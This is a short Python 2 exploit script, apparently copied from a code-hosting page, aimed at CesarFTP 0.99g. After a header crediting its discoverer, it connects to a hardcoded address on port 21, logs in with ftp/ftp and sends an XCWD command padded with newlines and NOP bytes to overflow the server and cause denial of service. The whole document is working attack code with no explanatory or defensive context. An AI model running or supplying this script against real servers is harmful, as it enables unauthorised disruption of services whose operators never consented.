32 lines
No EOL
746 B
Python
Executable file
32 lines
No EOL
746 B
Python
Executable file
#!/usr/bin/env python
|
|
#-*- coding:utf-8 -*-
|
|
# Exploit Title : CesarFTP 0.99g -(XCWD)Remote BoF Exploit
|
|
# Discovery by : Irving Aguilar
|
|
# Email : im.aguilar@protonmail.ch
|
|
# Discovery Date : 18.01.2016
|
|
# Tested Version : 0.99g
|
|
# Vulnerability Type : Denial of Service (DoS)
|
|
# Tested on OS : Windows XP Professional SP3 x86 es
|
|
|
|
import socket
|
|
|
|
|
|
buffer = 'XCWD ' + '\n' * 667 +'\x90' * 20
|
|
target = '192.168.1.73'
|
|
port = 21
|
|
|
|
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
|
connect = s.connect((target, port))
|
|
print '[*] Target: ' + target
|
|
print '[*] Port: ' + str(port)
|
|
s.recv(1024)
|
|
|
|
s.send('USER ftp\r\n')
|
|
s.recv(1024)
|
|
|
|
s.send('PASS ftp\r\n')
|
|
s.recv(1024)
|
|
|
|
s.send( buffer + '\r\n')
|
|
print '[+] Buffer sent'
|
|
s.close() |